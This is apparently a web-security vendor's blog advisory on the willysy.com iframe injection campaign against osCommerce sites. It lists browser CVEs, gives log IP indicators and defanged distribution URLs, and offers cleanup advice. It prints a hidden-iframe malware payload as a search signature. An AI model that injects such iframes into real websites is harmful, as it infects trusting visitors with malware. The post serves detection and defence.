Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.
We will be discussing the major outbreak of the “willysy.com” injection attacks in this article that at one time affected more than 100,000 websites.
What is the Willysy attack?
This particular code injection attack leads to the injection of malicious Iframes by malicious hackers into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a lego block on your ship, and the container can contain cargo from a source that you have no control over.
This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.
What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:
These exploits are used to infect benign, legitimate, sites. Once the malware is injected onto these exploited sites, the visitors to these sites are infected by various mechanisms used to install the malware on the visitors machine. Some of the mechanisms used to infect the visitors computer involve browser exploits like the ones listed below.
CVE-2010-1885 CVE-2010-0886 CVE-2010-0188 CVE-2006-0003
Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.
Search for the following malware:
<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
Search for the following malware closely associated with the willysy.com infection:
If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.
Another indication of infection is to search your server log files for accesses from the IP addresses below. If you do find these IP addresses in your log files, you should pay special attention to determining whether your site has been compromised or not.
22.214.171.124 126.96.36.199 188.8.131.52
Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).
Which sites are aiding the attack?
The below list includes sites used to spread the malware thus far.
hxxp://arhyv.ru/ hxxp://papucky.eu/ext/ hxxp://counv.ru/ hxxp://adeportes.es/ hxxp://labource.ru/ hxxp://gooqlepics.com/include.js hxxp://yandekapi.com/
Who owns these malicious sites?
The registrant for the malware disctibution site arhyv.ru is:
Source: Forum entry at DSLreports.com.
How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.
Till next time…